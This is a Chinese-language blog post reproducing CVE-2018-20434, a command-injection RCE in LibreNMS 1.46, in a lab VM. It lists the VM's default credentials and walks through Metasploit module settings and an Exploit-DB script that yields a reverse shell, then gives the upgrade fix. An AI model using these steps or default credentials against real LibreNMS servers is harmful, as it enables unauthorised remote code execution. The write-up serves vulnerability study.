前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >CVE-2018-20434 LibreNMS 1.46 - 'addhost' RCE漏洞复现

CVE-2018-20434 LibreNMS 1.46 - 'addhost' RCE漏洞复现

作者头像
墙角睡大觉
发布于 2019-10-08 08:55:29
发布于 2019-10-08 08:55:29
2.2K00
代码可运行
举报
运行总次数:0
代码可运行

0X1 漏洞概述

LibreNMS是一款基于PHP/MySQL/SNMP的自动发现的网络监控系统,其中包括对广泛的网络硬件和操作系统的支持,包括Cisco,LinuxFreeBSD,Juniper,Brocade,Foundry,HP等。

最近在复现其最新的漏洞的时候,顺带着复现其中之前的一个漏洞编号为CVE-2018-20434的漏洞。

漏洞触发在LibreNMS 1.46及之前版本中的capture.inc.php文件,文件所在位置:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
/opt/librenms/html/includes/output/capture.inc.php

通过在添加新设备时在public community参数中添加任意命令来触发利用,该命令会将未处理的请求发送到"addhost.inc.php"文件,因此,对注入的请求执行的任何系统执行都将导致远程执行代码。调用"capture.inc.php"将通过"popen"方法授予我们该行为,但是您可以通过请求以[file_name] .inc.php为参数的"ajax_output.php"来访问它。

漏洞分析具体详情可以参考如下翻译文章和原文

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://www.anquanke.com/post/id/16929
https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/

0X2 环境搭建

漏洞虚拟机环境下载地址

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://github.com/librenms/packer-builds/releases/tag/1.46
或者
链接:https://pan.baidu.com/s/1bKMZuMa7crCf81wz2uSsAA  提取码:vvtr

下载librenms-ubuntu-18.04-amd64.ova文件

下载完成之后,使用虚拟机软件打开即可。由于是第一次打开,一直没有获取到IP地址,经过分析发现是网口名称和配置文件中的网口名称不一致,所以需要修改一下网络配置文件,两个名称保持一致即可。

然后重启一下系统即可获取到IP地址。

使用浏览器访问80端口即可到登录页面

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://192.168.0.107/login

官网的虚拟机默认口令信息如下

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
SSH
用户名:librenms
密码:CDne3fwdfds

MySQL/MariaDB
用户名:librenms
密码:D42nf23rewD

WebUI
用户名:librenms
密码:D32fwefwef

使用WebUI账户登录即可

即可看到我们当前的系统环境信息。

0X3 漏洞利用

方法1:

漏洞利用脚本已经在metasploit中集成,可以使用如下脚本进行攻击

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
use exploit/linux/http/librenms_addhost_cmd_inject

设置参数

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
set rhosts 192.168.0.107
set username librenms
set password D32fwefwef
set lhost 192.168.0.105

然后输入run命令利用

即可成功拿到shell。

但是这样的方式需要账户信息,条件比较苛刻。

方法2:

下载漏洞利用的py脚本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://www.exploit-db.com/exploits/47044

利用过程参数需要cookie,浏览器抓包得到cookie信息

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://ip/devices/device=2/tab=capture/

然后作为参数带入:

kali中监听得到反弹的shell

即可利用成功!

0X4 漏洞修复

升级到最新的1.55版本即可

0X5 参考链接

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://docs.librenms.org/Installation/Images/
https://github.com/librenms/packer-builds/releases/tag/1.46
https://github.com/rapid7/metasploit-framework/blob/9edf92434cabbce83414204c30acdc8d6cda675f/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-09-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
WinXP的MS08-067漏洞利用复现和解决方案
本期文章由华章IT赞助,未经允许,禁止转发,本篇笔记内容来源于书籍《kali Linux 高级渗透测试》,如有需要,可以购买阅读。
天钧
2020/08/24
2.4K0
WinXP的MS08-067漏洞利用复现和解决方案
CVE-2018-8174 “双杀”0day漏洞复现
最近360核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用0day漏洞的APT攻击,捕获到了全球首例利用浏览器0day漏洞的新型Office文档攻击,我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。
FB客服
2018/07/30
1.4K0
CVE-2018-8174 “双杀”0day漏洞复现
用不同姿势复现 CVE-2018-8174 漏洞
日前,360 核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用 0day 漏洞的 APT 攻击,捕获到了全球首例利用浏览器 0day 漏洞的新型 Office 文档攻击,我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。
信安之路
2018/08/08
2.3K0
用不同姿势复现 CVE-2018-8174 漏洞
CVE-2019-0708 本地复现
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp * 系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的 。
安全小王子
2020/07/31
2.1K0
CVE-2019-0708 本地复现
CVE-2018-14847:一个能修复自己的RouterOS漏洞
2018年10月7日,来自全球知名高科技网络安全公司Tenable的安全研究人员Jacob Baines针对CVE-2018-14847[2]发布了一段新的概念验证(PoC)代码[1],实现了在受漏洞影响的MikroTik路由器上的远程代码执行。我们第一时间对PoC进行了研究,目前我们对漏洞利用的部分改进已经合入了Tenable的Github仓库[7]。本文将对CVE-2018-14847目录穿越漏洞成因进行分析,同时阐述我们的一些发现,如何通过受此漏洞影响的Winbox指令进行任意文件上传,从而实现一些更有趣的利用方式。我们能够利用CVE-2018-14847在RouterOS 6.42中触发后门shell,或在其他漏洞的配合下,通过在LD_LIBRARY_PATH中注入动态链接库的方法,对存在漏洞的可执行文件进行热补丁修复。我们还将在文章中介绍一种“修改”只读文件系统修复漏洞的方法。
绿盟科技研究通讯
2019/12/11
2.8K0
CVE-2018-14847:一个能修复自己的RouterOS漏洞
CVE-2020-0796:微软 SMBv3 协议RCE复现
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。
黑白天安全
2020/11/03
9900
CVE-2020-0796:微软 SMBv3 协议RCE复现
CVE-2020-0796漏洞复现(RCE)
2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。
剧终
2020/08/27
2.1K0
CVE-2020-0796漏洞复现(RCE)
[漏洞复现] 二.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
最近开始学习网络安全和系统安全,接触到了很多新术语、新方法和新工具,作为一名初学者,感觉安全领域涉及的知识好广、好杂,但同时也非常有意思。这系列文章是作者学习安全过程中的总结和探索,我们一起去躺过那些坑、跨过那些洞、守住那些站,真心希望文章对您有所帮助,感谢您的阅读和关注。
Gcow安全团队
2020/09/04
11.1K1
[漏洞复现] 二.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
漏洞复现 | CVE-2020-0796 (SMBv3远程代码执行) Windows-10
大家好,这里是 渗透攻击红队 的第 42 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更
渗透攻击红队
2020/12/14
7.9K0
Flash CVE-2018-15982 漏洞复现
2018年11月25日,乌俄两国又突发了“刻赤海峡”事件,乌克兰的数艘海军军舰在向刻赤海峡航行期间,与俄罗斯海军发生了激烈冲突,引发了全世界的高度关注。在2018年11月29日,“刻赤海峡”事件后稍晚时间,某团队立刻发起了针对俄罗斯的APT攻击行动。值得注意的是此次攻击相关样本来源于乌克兰,攻击目标则指向俄罗斯总统办公室所属的医疗机构。攻击者精心准备了一份俄文内容的员工问卷文档,该文档使用了最新的Flash 0day漏洞CVE-2018-15982和带有自毁功能的专属木马程序进行攻击,种种技术细节表明该APT组织不惜代价要攻下目标,但同时又十分小心谨慎。在发现攻击后,Adobe官方及时响应后在12月5日加急发布了新的Flash 32.0.0.101版本修复了此次的0day漏洞。
墙角睡大觉
2019/09/24
9310
Flash CVE-2018-15982 漏洞复现
msf之CVE-2019-0708-Bluekeep漏洞利用模块
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。
逍遥子大表哥
2021/12/17
1.8K0
漏洞复现 | CVE‐2020‐5902踩坑记
F5 BIG‐IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞(CVE‐2020‐5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下获得目标服务器的权限,实现远程代码执行。
Ms08067安全实验室
2020/08/28
9470
CVE-2019-0708 漏洞分析及相关测试
在CVE-2019-0708公布后几天就已经尝试过复现该漏洞,但借助当时exp并没能成功复现反弹shell的过程遂放弃,故借助这次漏洞复现报告再来尝试复现该漏洞,因为还在大三学习中,有很多知识还没有掌握,出现的错误希望得到指正,也想借此给19年的学习画上句号,希望这次可以成功吧。
FB客服
2020/02/20
1.5K0
CVE-2019-0708 漏洞分析及相关测试
CVE-2019-0708:RDP终极EXP爆出
CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。
用户1631416
2019/09/17
2.1K0
CVE-2019-0708:RDP终极EXP爆出
CVE-2019-6340 Drupal8's REST RCE 漏洞复现
Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。
墙角睡大觉
2019/09/24
2.5K0
CVE-2019-6340 Drupal8's REST RCE 漏洞复现
Windows NetLogon权限提升漏洞(CVE-2019-1424) 复现
2020年08月11日,微软MSRC官方发布了NetLogon特权提升漏洞的安全通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重, CVSS 评分:10.0。该漏洞由Secura公司的Tom Tervoort发现提交,因此被命名为ZeroLogon。
pensar
2020/09/24
1.8K0
Windows NetLogon权限提升漏洞(CVE-2019-1424) 复现
CVE-2020-0796:微软 SMBv3 协议RCE复现
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。
Timeline Sec
2020/06/10
7520
CVE-2020-0796:微软 SMBv3 协议RCE复现
CVE-2021-3493:Linux kernel特权提升漏洞复现
linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。
Timeline Sec
2021/04/26
1.7K0
CVE-2019-6340 Drupal8's REST RCE 漏洞复现
Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。
用户1631416
2019/08/09
3.4K0
[系统安全] 三十八.Metasploit后渗透技术信息收集、权限提权和功能模块详解及防护建议
首先,祝大家中秋节和教师节快乐,每逢佳节倍思亲!其次,希望家乡疫情早日结束,贵阳贵安加油!
Eastmount
2022/11/25
2.2K0
推荐阅读
相关推荐
WinXP的MS08-067漏洞利用复现和解决方案
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
查看详情【社区公告】 技术创作特训营有奖征文